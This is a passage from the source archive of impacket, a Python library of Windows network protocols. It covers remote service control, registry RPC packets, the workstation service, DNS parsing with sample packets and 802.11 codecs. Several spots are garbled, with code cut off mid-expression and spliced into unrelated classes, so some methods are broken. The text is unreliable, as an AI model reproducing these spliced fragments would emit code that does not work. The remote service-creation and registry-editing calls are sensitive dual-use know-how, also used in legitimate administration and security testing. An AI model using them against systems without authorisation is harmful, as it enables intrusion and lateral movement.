SVCCTLCreateServiceHeader() creates.set_context_handle(context_handle) creates.set_service_name(service_name) creates.set_service_path(service_path) self._dcerpc.send(creates) data = self._dcerpc.recv() retVal = SVCCTLRespCreateServiceHeader(data) return retVal def close_handle(self, context_handle): closeh = SVCCTLCloseServiceHeader() closeh.set_context_handle(context_handle) self._dcerpc.send(closeh) data = self._dcerpc.recv() retVal = SVCCTLRespCloseServiceHeader(data) return retVal def delete_service(self, context_handle): deletes = SVCCTLDeleteServiceHeader() deletes.set_context_handle(context_handle) self._dcerpc.send(deletes) data = self._dcerpc.recv() retVal = SVCCTLRespDeleteServiceHeader(data) return retVal def open_service(self, context_handle, service_name): opens = SVCCTLOpenServiceHeader() opens.set_context_handle(context_handle) opens.set_service_name(service_name) self._dcerpc.send(opens) data = self._dcerpc.recv() retVal = SVCCTLRespOpenServiceHeader(data) return retVal def stop_service(self, context_handle): stops = SVCCTLStopServiceHeader() stops.set_context_handle(context_handle) self._dcerpc.send(stops) data = self._dcerpc.recv() retVal = SVCCTLRespStopServiceHeader(data) return retVal def start_service(self, context_handle, arguments): starts = SVCCTLStartServiceHeader() starts.set_arguments( arguments ) starts.set_context_handle(context_handle) self._dcerpc.send(starts) data = self._dcerpc.recv() retVal = SVCCTLRespStartServiceHeader(data) return retVal # Use these functions to manipulate services. The previous ones are left for backward compatibility reasons. def doRequest(self, request, noAnswer = 0, checkReturn = 1): self._dcerpc.call(request.opnum, request) if noAnswer: return else: answer = self._dcerpc.recv() if checkReturn and answer[-4:] != '\x00\x00\x00\x00': error_code = unpack(" 0 return WINREGDeleteValue.__SIZE + var_size class WINREGRespDeleteValue(ImpactPacket.Header): __SIZE = 4 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, WINREGRespDeleteValue.__SIZE) if aBuffer: self.load_header(aBuffer) def get_return_code(self): return self.get_long(0, '<') def set_return_code(self, code): self.set_long(0, code, '<') def get_header_size(self): return WINREGRespDeleteValue.__SIZE class WINREGDeleteKey(ImpactPacket.Header): OP_NUM = 7 __SIZE = 40 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, WINREGDeleteKey.__SIZE) # Write some unknown fluff. self.get_bytes()[22:36] = array.array('B', '\x0a\x02\x00\xEC\xfd\x7f\x05\x01' + (6 * '\x00')) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_key_name(self): return unicode(self.get_bytes().tostring()[40:], 'utf-16le') def set_key_name(self, name): if not name.endswith('\0'): name += '\0' namelen = len(name) wlen = 2 * namelen if (wlen % 4): pad = ('\x00' * (4 - (wlen % 4))) else: pad = '' self.set_word(20, 2 * namelen, '<') self.set_long(36, namelen, '<') self.get_bytes()[40:] = array.array('B', name.encode('utf-16le') + pad) def get_header_size(self): var_size = len(self.get_bytes()) - WINREGDeleteKey.__SIZE assert var_size > 0 return WINREGDeleteKey.__SIZE + var_size class WINREGRespDeleteKey(ImpactPacket.Header): __SIZE = 4 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, WINREGRespDeleteKey.__SIZE) if aBuffer: self.load_header(aBuffer) def get_return_code(self): return self.get_long(0, '<') def set_return_code(self, code): self.set_long(0, code, '<') def get_header_size(self): return WINREGRespDeleteKey.__SIZE class WINREGCreateKey(ImpactPacket.Header): OP_NUM = 6 __SIZE = 64 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, WINREGCreateKey.__SIZE) # Write some unknown fluff. self.get_bytes()[22:36] = array.array('B', '\x0a\x02\x00\xEC\xfd\x7f\x05\x01' + (6 * '\x00')) self.get_bytes()[-24:] = array.array('B', 15 * '\x00' + '\x02' + 8 * '\x00') if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_key_name(self): return unicode(self.get_bytes().tostring()[40:-24], 'utf-16le') def set_key_name(self, name): if not name.endswith('\0'): name += '\0' namelen = len(name) wlen = 2 * namelen if (wlen % 4): pad = ('\x00' * (4 - (wlen % 4))) else: pad = '' self.set_word(20, 2 * namelen, '<') self.set_long(36, namelen, '<') self.get_bytes()[40:-24] = array.array('B', name.encode('utf-16le') + pad) def get_header_size(self): var_size = len(self.get_bytes()) - WINREGCreateKey.__SIZE assert var_size > 0 return WINREGCreateKey.__SIZE + var_size class WINREGRespCreateKey(ImpactPacket.Header): __SIZE = 28 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, WINREGRespCreateKey.__SIZE) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_return_code(self): return self.get_long(24, '<') def set_return_code(self, code): self.set_long(24, code, '<') def get_header_size(self): return WINREGRespCreateKey.__SIZE #context handle # WORD LEN (counting the 0s) # DWORD LEN (in unicode, that is without counting the 0s) # KEYNAME in UNICODE # 6 bytes UNKNOWN (all 0s) # DWORD ACCESS_MASK class WINREGOpenKey(ImpactPacket.Header): OP_NUM = 15 __SIZE = 44 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, WINREGOpenKey.__SIZE) self.set_access_mask(KEY_READ) # Write some unknown fluff. self.get_bytes()[24:28] = array.array('B', '\x00\xEC\xfd\x7f') if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_key_name(self): return unicode(self.get_bytes().tostring()[40:-4], 'utf-16le') def set_key_name(self, name): if not name.endswith('\0'): name += '\0' namelen = len(name) ndrStr = ndrutils.NDRStringW() ndrStr['Data'] = name.encode('utf-16le') self.set_word(20, 2 * namelen, '<') self.set_word(22, 2 * namelen, '<') self.get_bytes()[28:-4] = array.array('B',str(ndrStr) + '\x00' * 4) def get_access_mask(self): return self.get_long(-4, '<') def set_access_mask(self, mask): self.set_long(-4, mask, '<') def get_header_size(self): var_size = len(self.get_bytes()) - WINREGOpenKey.__SIZE assert var_size > 0 return WINREGOpenKey.__SIZE + var_size class WINREGRespOpenKey(ImpactPacket.Header): __SIZE = 24 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, WINREGRespOpenKey.__SIZE) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_return_code(self): return self.get_long(20, '<') def set_return_code(self, code): self.set_long(20, code, '<') def get_header_size(self): return WINREGRespOpenKey.__SIZE class WINREGSetValue(ImpactPacket.Header): OP_NUM = 22 __SIZE = 52 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, WINREGSetValue.__SIZE) # Write some unknown fluff. self.get_bytes()[24:28] = array.array('B', '\x00\xEC\xfd\x7f') self.namelen = 0 if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_name(self): return unicode(self.get_bytes().tostring()[40:40+self.namelen], 'utf-16le') def set_name(self, name): if not name.endswith('\0'): name += '\0' namelen = len(name) if namelen & 0x01: pad = '\x00\x00' else: pad = '' self.set_word(20, 2 * namelen, '<') self.set_word(22, 2 * namelen, '<') self.set_long(28, namelen, '<') self.set_long(36, namelen, '<') padded_name = array.array('B', name.encode('utf-16le') + pad) self.get_bytes()[40:40+self.namelen] = padded_name self.namelen = len(padded_name) def get_data_type(self): return self.get_long(40+self.namelen, '<') def set_data_type(self, type): self.set_long(40+self.namelen, type, '<') def get_data(self): data_type = self.get_data_type() data = self.get_bytes().tostring()[40+self.namelen+8:-4] if data_type == REG_DWORD: data = struct.unpack(' 0 return WINREGSetValue.__SIZE + var_size class WINREGRespSetValue(ImpactPacket.Header): __SIZE = 4 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, WINREGRespSetValue.__SIZE) if aBuffer: self.load_header(aBuffer) def get_return_code(self): return self.get_long(0, '<') def set_return_code(self, code): self.set_long(0, code, '<') def get_header_size(self): return WINREGRespSetValue.__SIZE # context_handle # len # \x0a\x02\x00\xec\xfd\x7f\x05\x01 \x00 * 6 # len /2 # valuename class WINREGQueryValue(ImpactPacket.Header): OP_NUM = 17 __SIZE = 80 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, WINREGQueryValue.__SIZE) self.set_data_len(0xC8) # Write some unknown fluff. self.get_bytes()[24:28] = array.array('B', '\x00\xEC\xfd\x7f') self.get_bytes()[-40:-28] = array.array('B', '\x8c\xfe\x12\x00\x69\x45\x13\x00\x69\x45\x13\x00') self.get_bytes()[-16:-12] = array.array('B', '\x94\xfe\x12\x00') self.get_bytes()[-8:-4] = array.array('B', '\x80\xfe\x12\x00') if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_name(self): return unicode(self.get_bytes().tostring()[40:-40], 'utf-16le') def set_name(self, name): if not name.endswith('\0'): name += '\0' namelen = len(name) if namelen & 0x01: pad = '\x00\x00' else: pad = '' self.set_word(20, 2 * namelen, '<') self.set_word(22, 2 * namelen, '<') self.set_long(28, namelen, '<') self.set_long(36, namelen, '<') self.get_bytes()[40:-40] = array.array('B', name.encode('utf-16le') + pad) def get_data_len(self): return self.get_long(-28, '<') def set_data_len(self, len): self.set_long(-28, len, '<') self.set_long(-12, len, '<') def get_header_size(self): var_size = len(self.get_bytes()) - WINREGQueryValue.__SIZE assert var_size > 0 return WINREGQueryValue.__SIZE + var_size class WINREGRespQueryValue(ImpactPacket.Header): __SIZE = 44 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, WINREGRespQueryValue.__SIZE) if aBuffer: self.load_header(aBuffer) def get_data_type(self): return self.get_long(4, '<') def set_data_type(self, type): self.set_long(4, type, '<') def get_data_len(self): return self.get_long(20, '<') def set_data_len(self, len): self.set_long(20, len, '<') self.set_long(28, len, '<') def get_data(self): data_type = self.get_data_type() data = self.get_bytes().tostring()[24:24+self.get_data_len()] if data_type == REG_DWORD: data = struct.unpack(' 0 return WINREGRespQueryValue.__SIZE + var_size class WINREGOpenHK(ImpactPacket.Header): # OP_NUM is a "virtual" field. __SIZE = 12 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, WINREGOpenHK.__SIZE) self.set_long(0, 0x06f7c0, '<') # magic, apparently always the same self.set_long(4, 0x019b58, '<') # don't know exactly, can be almost anything so far self.set_access_mask(0x2000000) if aBuffer: self.load_header(aBuffer) def get_access_mask(self): return self.get_long(8, '<') def set_access_mask(self, mask): self.set_long(8, mask, '<') def get_header_size(self): return WINREGOpenHK.__SIZE class WINREGRespOpenHK(ImpactPacket.Header): __SIZE = 24 def __init__(self, aBuffer = None): ImpactPacket.Header.__init__(self, WINREGRespOpenHK.__SIZE) if aBuffer: self.load_header(aBuffer) def get_context_handle(self): return self.get_bytes().tolist()[:20] def set_context_handle(self, handle): assert 20 == len(handle) self.get_bytes()[:20] = array.array('B', handle) def get_return_code(self): return self.get_long(20, '<') def set_return_code(self, code): self.set_long(20, code, '<') def get_header_size(self): return WINREGRespOpenHK.__SIZE class WINREGOpenHKCR(WINREGOpenHK): OP_NUM = 0 class WINREGOpenHKLM(WINREGOpenHK): OP_NUM = 2 class WINREGOpenHKU(WINREGOpenHK): OP_NUM = 4 class DCERPCWinReg: def __init__(self, dce): self._dce = dce def openHKCR(self): winregopen = WINREGOpenHKCR() self._dce.send(winregopen) data = self._dce.recv() retVal = WINREGRespOpenHK(data) return retVal def openHKU(self): winregopen = WINREGOpenHKU() self._dce.send(winregopen) data = self._dce.recv() retVal = WINREGRespOpenHK(data) return retVal def regCloseKey(self, context_handle): wreg_closekey = WINREGCloseKey() wreg_closekey.set_context_handle( context_handle ) self._dce.send(wreg_closekey) data = self._dce.recv() retVal = WINREGRespCloseKey(data) return retVal def regOpenKey(self, context_handle, aKeyname, anAccessMask): wreg_openkey = WINREGOpenKey() wreg_openkey.set_context_handle( context_handle ) wreg_openkey.set_key_name( aKeyname ) wreg_openkey.set_access_mask( anAccessMask ) self._dce.send(wreg_openkey) data = self._dce.recv() retVal = WINREGRespOpenKey(data) return retVal def regCreateKey(self, context_handle, aKeyname): wreg_createkey = WINREGCreateKey() wreg_createkey.set_context_handle( context_handle ) wreg_createkey.set_key_name( aKeyname ) self._dce.send(wreg_createkey) data = self._dce.recv() retVal = WINREGRespCreateKey(data) return retVal def regDeleteKey(self, context_handle, aKeyname): wreg_deletekey = WINREGDeleteKey() wreg_deletekey.set_context_handle( context_handle ) wreg_deletekey.set_key_name( aKeyname ) self._dce.send(wreg_deletekey) data = self._dce.recv() retVal = WINREGRespDeleteKey(data) return retVal def regDeleteValue(self, context_handle, aValuename): wreg_deletevalue = WINREGDeleteValue() wreg_deletevalue.set_context_handle( context_handle ) wreg_deletevalue.set_name( aValuename ) self._dce.send(wreg_deletevalue) data = self._dce.recv() retVal = WINREGRespDeleteValue(data) return retVal def regQueryValue(self, context_handle, aValueName, aDataLen): wreg_queryval = WINREGQueryValue() wreg_queryval.set_context_handle( context_handle ) wreg_queryval.set_name( aValueName ) wreg_queryval.set_data_len( aDataLen ) self._dce.send(wreg_queryval) data = self._dce.recv() retVal = WINREGRespQueryValue(data) return retVal def regSetValue(self, context_handle, aValueType, aValueName, aData): wreg_setval = WINREGSetValue() wreg_setval.set_context_handle( context_handle ) wreg_setval.set_data_type(aValueType) wreg_setval.set_name(aValueName) wreg_setval.set_data(aData) self._dce.send(wreg_setval) data = self._dce.recv() retVal = WINREGRespSetValue(data) return retVal def openHKLM(self): winregopen = WINREGOpenHKLM() self._dce.send(winregopen) data = self._dce.recv() retVal = WINREGRespOpenHK(data) return retVal impacket-0.9.10/impacket/dcerpc/wkssvc.py0000600000076500000240000000601512141750575020402 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: wkssvc.py 529 2012-04-29 21:39:46Z bethus@gmail.com $ # # Author: Alberto Solino # # Description: # WKSSVC interface implementation. # from impacket.structure import Structure from impacket import dcerpc from impacket.dcerpc import ndrutils from impacket.uuid import uuidtup_to_bin MSRPC_UUID_WKSSVC = uuidtup_to_bin(('6BFFD098-A112-3610-9833-46C3F87E345A','1.0')) class WKSTA_TRANSPORT_INFO_0(Structure): structure = ( ('UnUsed','= len(buffer): raise Exception("No more data to parse. Offset is bigger than length of buffer.") byte = struct.unpack("B", buffer[offset])[0] if byte & 0xC0 == 0xC0: pointer = struct.unpack("!H", buffer[offset:offset+2])[0] # network unsigned short pointer = (pointer & 0x3FFF) - self.__HEADER_BASE_SIZE offset += 2 name = self.parseCompressedMessage(buffer, pointer)[1] return (offset, name) else: if byte == 0x00: offset += 1 return (offset, '') offset += 1 name = buffer[offset:offset+byte] offset += byte offset, unamed = self.parseCompressedMessage(buffer, offset) if not unamed: return (offset, name) else: return (offset, name + "." + unamed) def get_answers(self): return self.__get_answers()[0] def get_authoritatives(self): return self.__get_authoritatives()[0] def get_additionals(self): return self.__get_additionals()[0] def __get_answers(self): offset = self.__get_questions()[1] # get the initial offset ancount = self.get_ancount() return self.__process_answer_structure(offset, ancount) def __get_authoritatives(self): 'Get a list of the DNS Authoritatives.' offset = self.__get_answers()[1] # get the initial offset nscount = self.get_nscount() return self.__process_answer_structure(offset, nscount) def __get_additionals(self): 'Get a list of the DNS Additional Records.' offset = self.__get_authoritatives()[1] # get the initial offset arcount = self.get_arcount() return self.__process_answer_structure(offset, arcount) def __process_answer_structure(self, offset, num): aux = [] data = self.get_body_as_string() for i in range(num): offset, qname = self.parseCompressedMessage(data, offset) qtype = data[offset:offset+self.__TYPE_LEN] offset += self.__TYPE_LEN qclass = data[offset:offset+self.__CLASS_LEN] offset += self.__CLASS_LEN qtype = struct.unpack("!H", qtype)[0] qclass = struct.unpack("!H", qclass)[0] qttl = data[offset:offset+self.__TTL_LEN] qttl = struct.unpack("!L", qttl)[0] offset += self.__TTL_LEN qrdlength = data[offset:offset+self.__RDLENGTH_LEN] qrdlength = struct.unpack("!H", qrdlength)[0] offset += self.__RDLENGTH_LEN qrdata = {} if qtype == DNSType.A: # IP Address Unsigned 32-bit value representing the IP address qrdata["IPAddress"] = socket.inet_ntoa(data[offset:offset+qrdlength]) offset += self.__TYPE_A_LEN elif qtype == DNSType.SOA: # Primary NS Variable length. The name of the Primary Master for the domain. May be a label, pointer or any combination. offset, primaryNs = self.parseCompressedMessage(data, offset) qrdata["PrimaryNS"] = primaryNs # Admin MB Variable length. The administrator's mailbox. May be a label, pointer or any combination. offset, adminMb = self.parseCompressedMessage(data, offset) qrdata["AdminMB"] = adminMb # Serial Number Unsigned 32-bit integer. qrdata["SerialNumber"] = struct.unpack("!L", data[offset:offset+self.__SERIAL_LEN])[0] offset += self.__SERIAL_LEN # Refresh interval Unsigned 32-bit integer. qrdata["RefreshInterval"] = struct.unpack("!L", data[offset:offset+self.__REFRESH_LEN])[0] offset += self.__REFRESH_LEN # Retry Interval Unsigned 32-bit integer. qrdata["RetryInterval"] = struct.unpack("!L", data[offset:offset+self.__RETRY_LEN])[0] offset += self.__RETRY_LEN # Expiration Limit Unsigned 32-bit integer. qrdata["ExpirationLimit"] = struct.unpack("!L", data[offset:offset+self.__EXPIRATION_LEN])[0] offset += self.__EXPIRATION_LEN # Minimum TTL Unsigned 32-bit integer. qrdata["MinimumTTL"] = struct.unpack("!L", data[offset:offset+self.__MINTTL_LEN])[0] offset += self.__MINTTL_LEN elif qtype == DNSType.MX: # Preference Unsigned 16-bit integer. qrdata["Preference"] = struct.unpack("!H", data[offset:offset+self.__PREF_LEN])[0] # Mail Exchanger The name host name that provides the service. May be a label, pointer or any combination. offset, mailExch = self.parseCompressedMessage(data, offset) qrdata["MailExchanger"] = mailExch elif qtype == DNSType.PTR or qtype == DNSType.NS or qtype == DNSType.CNAME: # Name The host name that represents the supplied IP address (in the case of a PTR) or the NS name for the supplied domain (in the case of NS). May be a label, pointer or any combination. offset, name = self.parseCompressedMessage(data, offset) qrdata["Name"] = name else: offset += qrdlength aux.append((qname, qtype, qclass, qttl, qrdata)) return (aux, offset) def get_header_size(self): return 12 def __str__(self): res = "" id = self.get_transaction_id() flags = self.get_flags() qdcount = self.get_qdcount() ancount = self.get_ancount() nscount = self.get_nscount() arcount = self.get_arcount() res += "DNS " if flags & DNSFlags.QR_RESPONSE: res += "RESPONSE\n" else: res += "QUERY\n" res += " - Transaction ID -- [0x%04x] %d\n" % (id, id) res += " - Flags ----------- [0x%04x] %d\n" % (flags, flags) res += " - QdCount --------- [0x%04x] %d\n" % (qdcount, qdcount) res += " - AnCount --------- [0x%04x] %d\n" % (ancount, ancount) res += " - NsCount --------- [0x%04x] %d\n" % (nscount, nscount) res += " - ArCount --------- [0x%04x] %d\n" % (arcount, arcount) if qdcount > 0: res += " - Questions:\n" questions = self.get_questions() questions.reverse() while(questions): qname, qtype, qclass = questions.pop() format = (qname, DNSType.getTypeName(qtype), qtype, DNSClass.getClassName(qclass), qclass) res += " * Domain: %s - Type: %s [%04x] - Class: %s [%04x]\n" % format if ancount > 0: res += " - Answers:\n" answers = self.get_answers() answers.reverse() while(answers): qname, qtype, qclass, qttl, qrdata = answers.pop() format = (qname, DNSType.getTypeName(qtype), qtype, DNSClass.getClassName(qclass), qclass, qttl, repr(qrdata)) res += " * Domain: %s - Type: %s [%04x] - Class: %s [%04x] - TTL: %d seconds - %s\n" % format if nscount > 0: res += " - Authoritatives:\n" authoritatives = self.get_authoritatives() authoritatives.reverse() while(authoritatives): qname, qtype, qclass, qttl, qrdata = authoritatives.pop() format = (qname, DNSType.getTypeName(qtype), qtype, DNSClass.getClassName(qclass), qclass, qttl, repr(qrdata)) res += " * Domain: %s - Type: %s [%04x] - Class: %s [%04x] - TTL: %d seconds - %s\n" % format if arcount > 0: res += " - Additionals:\n" additionals = self.get_additionals() additionals.reverse() while(additionals): qname, qtype, qclass, qttl, qrdata = additionals.pop() format = (qname, DNSType.getTypeName(qtype), qtype, DNSClass.getClassName(qclass), qclass, qttl, repr(qrdata)) res += " * Domain: %s - Type: %s [%04x] - Class: %s [%04x] - TTL: %d seconds - %s\n" % format return res def get_packet(self): return Header.get_packet(self) if __name__ == "__main__": pkts = [ "\x6a\x8c\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x03\x77\x77\x77" \ "\x05\x74\x61\x72\x74\x61\x03\x63\x6f\x6d\x00\x00\x01\x00\x01", "\x6a\x8c\x81\x80\x00\x01\x00\x02\x00\x02\x00\x00\x03\x77\x77\x77" \ "\x05\x74\x61\x72\x74\x61\x03\x63\x6f\x6d\x00\x00\x01\x00\x01\xc0" \ "\x0c\x00\x05\x00\x01\x00\x00\x07\x08\x00\x02\xc0\x10\xc0\x10\x00" \ "\x01\x00\x01\x00\x00\x07\x08\x00\x04\x45\x59\x1f\xc7\xc0\x10\x00" \ "\x02\x00\x01\x00\x02\xa3\x00\x00\x0f\x03\x6e\x73\x31\x08\x62\x6c" \ "\x75\x65\x68\x6f\x73\x74\xc0\x16\xc0\x10\x00\x02\x00\x01\x00\x02" \ "\xa3\x00\x00\x06\x03\x6e\x73\x32\xc0\x4d", "\x82\x75\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x03\x77\x77\x77" \ "\x04\x6a\x68\x6f\x6e\x03\x63\x6f\x6d\x00\x00\x01\x00\x01", "\x82\x75\x81\x80\x00\x01\x00\x01\x00\x02\x00\x02\x03\x77\x77\x77" \ "\x04\x6a\x68\x6f\x6e\x03\x63\x6f\x6d\x00\x00\x01\x00\x01\xc0\x0c" \ "\x00\x01\x00\x01\x00\x00\x00\x05\x00\x04\xd1\x3b\xc3\x14\xc0\x10" \ "\x00\x02\x00\x01\x00\x00\x06\xf8\x00\x0f\x03\x6e\x73\x31\x08\x74" \ "\x72\x61\x66\x66\x69\x63\x7a\xc0\x15\xc0\x10\x00\x02\x00\x01\x00" \ "\x00\x06\xf8\x00\x06\x03\x6e\x73\x32\xc0\x3e\xc0\x3a\x00\x01\x00" \ "\x01\x00\x00\x00\x0d\x00\x04\xd1\x3b\xc2\xf6\xc0\x55\x00\x01\x00" \ "\x01\x00\x00\x00\x85\x00\x04\xd1\x3b\xc3\xf6", "\xef\x55\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x04\x6d\x61\x69" \ "\x6c\x06\x67\x6f\x6f\x67\x6c\x65\x03\x63\x6f\x6d\x00\x00\x01\x00" \ "\x01", "\xef\x55\x81\x80\x00\x01\x00\x04\x00\x04\x00\x04\x04\x6d\x61\x69" \ "\x6c\x06\x67\x6f\x6f\x67\x6c\x65\x03\x63\x6f\x6d\x00\x00\x01\x00" \ "\x01\xc0\x0c\x00\x05\x00\x01\x00\x00\x06\x79\x00\x0f\x0a\x67\x6f" \ "\x6f\x67\x6c\x65\x6d\x61\x69\x6c\x01\x6c\xc0\x11\xc0\x2d\x00\x01" \ "\x00\x01\x00\x00\x00\x77\x00\x04\xd1\x55\xc3\x53\xc0\x2d\x00\x01" \ "\x00\x01\x00\x00\x00\x77\x00\x04\xd1\x55\xc3\x12\xc0\x2d\x00\x01" \ "\x00\x01\x00\x00\x00\x77\x00\x04\xd1\x55\xc3\x13\xc0\x11\x00\x02" \ "\x00\x01\x00\x00\x00\x5d\x00\x06\x03\x6e\x73\x33\xc0\x11\xc0\x11" \ "\x00\x02\x00\x01\x00\x00\x00\x5d\x00\x06\x03\x6e\x73\x34\xc0\x11" \ "\xc0\x11\x00\x02\x00\x01\x00\x00\x00\x5d\x00\x06\x03\x6e\x73\x31" \ "\xc0\x11\xc0\x11\x00\x02\x00\x01\x00\x00\x00\x5d\x00\x06\x03\x6e" \ "\x73\x32\xc0\x11\xc0\x9c\x00\x01\x00\x01\x00\x00\x04\x4e\x00\x04" \ "\xd8\xef\x20\x0a\xc0\xae\x00\x01\x00\x01\x00\x00\x06\x64\x00\x04" \ "\xd8\xef\x22\x0a\xc0\x78\x00\x01\x00\x01\x00\x00\x00\x05\x00\x04" \ "\xd8\xef\x24\x0a\xc0\x8a\x00\x01\x00\x01\x00\x00\x00\x08\x00\x04" \ "\xd8\xef\x26\x0a" ] for pkt in pkts: d = DNS(pkt) print d impacket-0.9.10/impacket/dot11.py0000600000076500000240000032615712141750575016566 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: dot11.py 529 2012-04-29 21:39:46Z bethus@gmail.com $ # # Description: # IEEE 802.11 Network packet codecs. # # Author: # Gustavo Moreira import array import struct import socket import string import sys import types from ImpactPacket import ProtocolPacket from binascii import hexlify,crc32 from Dot11Crypto import RC4 class Dot11ManagementCapabilities(): # # Capability Information # 0 1 2 3 4 5 6 7 8 9 A B C D E F # +---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+ # | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | # +---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+ # | | | | | | | | | | | | | | | | # | | | | | | | | | | | | | | |---+-- Reserved # | | | | | | | | | | | | | | # | | | | | | | | | | | | | |---------- DSSS-OFDM # | | | | | | | | | | | | | # | | | | | | | | | | | |---+-------------- Reserved # | | | | | | | | | | | # | | | | | | | | | | |---------------------- Short slot time # | | | | | | | | | | # | | | | | | | | |---+-------------------------- Reserved # | | | | | | | | # | | | | | | | |---------------------------------- Channel agility (802.11b) # | | | | | | | # | | | | | | |-------------------------------------- PBCC (802.11b) # | | | | | | # | | | | | |------------------------------------------ Short preamble (802.11b) # | | | | | # | | | | |---------------------------------------------- Privacy # | | | | # | | | |-------------------------------------------------- CF-Poll request # | | | # | | |------------------------------------------------------ CF-Pollable # | | # | |---------------------------------------------------------- IBSS # | # |-------------------------------------------------------------- ESS # CAPABILITY_RESERVED_1 = int("1000000000000000", 2) CAPABILITY_RESERVED_2 = int("0100000000000000", 2) CAPABILITY_DSSS_OFDM = int("0010000000000000", 2) CAPABILITY_RESERVED_3 = int("0001000000000000", 2) CAPABILITY_RESERVED_4 = int("0000100000000000", 2) CAPABILITY_SHORT_SLOT_TIME = int("0000010000000000", 2) CAPABILITY_RESERVED_5 = int("0000001000000000", 2) CAPABILITY_RESERVED_6 = int("0000000100000000", 2) CAPABILITY_CH_AGILITY = int("0000000010000000", 2) CAPABILITY_PBCC = int("0000000001000000", 2) CAPABILITY_SHORT_PREAMBLE = int("0000000000100000", 2) CAPABILITY_PRIVACY = int("0000000000010000", 2) CAPABILITY_CF_POLL_REQ = int("0000000000001000", 2) CAPABILITY_CF_POLLABLE = int("0000000000000100", 2) CAPABILITY_IBSS = int("0000000000000010", 2) CAPABILITY_ESS = int("0000000000000001", 2) class Dot11Types(): # Management Types/SubTypes DOT11_TYPE_MANAGEMENT = int("00",2) DOT11_SUBTYPE_MANAGEMENT_ASSOCIATION_REQUEST = int("0000",2) DOT11_SUBTYPE_MANAGEMENT_ASSOCIATION_RESPONSE = int("0001",2) DOT11_SUBTYPE_MANAGEMENT_REASSOCIATION_REQUEST = int("0010",2) DOT11_SUBTYPE_MANAGEMENT_REASSOCIATION_RESPONSE = int("0011",2) DOT11_SUBTYPE_MANAGEMENT_PROBE_REQUEST = int("0100",2) DOT11_SUBTYPE_MANAGEMENT_PROBE_RESPONSE = int("0101",2) DOT11_SUBTYPE_MANAGEMENT_RESERVED1 = int("0110",2) DOT11_SUBTYPE_MANAGEMENT_RESERVED2 = int("0111",2) DOT11_SUBTYPE_MANAGEMENT_BEACON = int("1000",2) DOT11_SUBTYPE_MANAGEMENT_ATIM = int("1001",2) DOT11_SUBTYPE_MANAGEMENT_DISASSOCIATION = int("1010",2) DOT11_SUBTYPE_MANAGEMENT_AUTHENTICATION = int("1011",2) DOT11_SUBTYPE_MANAGEMENT_DEAUTHENTICATION = int("1100",2) DOT11_SUBTYPE_MANAGEMENT_ACTION = int("1101",2) DOT11_SUBTYPE_MANAGEMENT_RESERVED3 = int("1110",2) DOT11_SUBTYPE_MANAGEMENT_RESERVED4 = int("1111",2) DOT11_TYPE_MANAGEMENT_SUBTYPE_ASSOCIATION_REQUEST = \ DOT11_TYPE_MANAGEMENT|DOT11_SUBTYPE_MANAGEMENT_ASSOCIATION_REQUEST<<2 DOT11_TYPE_MANAGEMENT_SUBTYPE_ASSOCIATION_RESPONSE = \ DOT11_TYPE_MANAGEMENT|DOT11_SUBTYPE_MANAGEMENT_ASSOCIATION_RESPONSE<<2 DOT11_TYPE_MANAGEMENT_SUBTYPE_REASSOCIATION_REQUEST = \ DOT11_TYPE_MANAGEMENT|DOT11_SUBTYPE_MANAGEMENT_REASSOCIATION_REQUEST<<2 DOT11_TYPE_MANAGEMENT_SUBTYPE_REASSOCIATION_RESPONSE = \ DOT11_TYPE_MANAGEMENT|DOT11_SUBTYPE_MANAGEMENT_REASSOCIATION_RESPONSE<<2 DOT11_TYPE_MANAGEMENT_SUBTYPE_PROBE_REQUEST = \ DOT11_TYPE_MANAGEMENT|DOT11_SUBTYPE_MANAGEMENT_PROBE_REQUEST<<2 DOT11_TYPE_MANAGEMENT_SUBTYPE_PROBE_RESPONSE = \ DOT11_TYPE_MANAGEMENT|DOT11_SUBTYPE_MANAGEMENT_PROBE_RESPONSE<<2 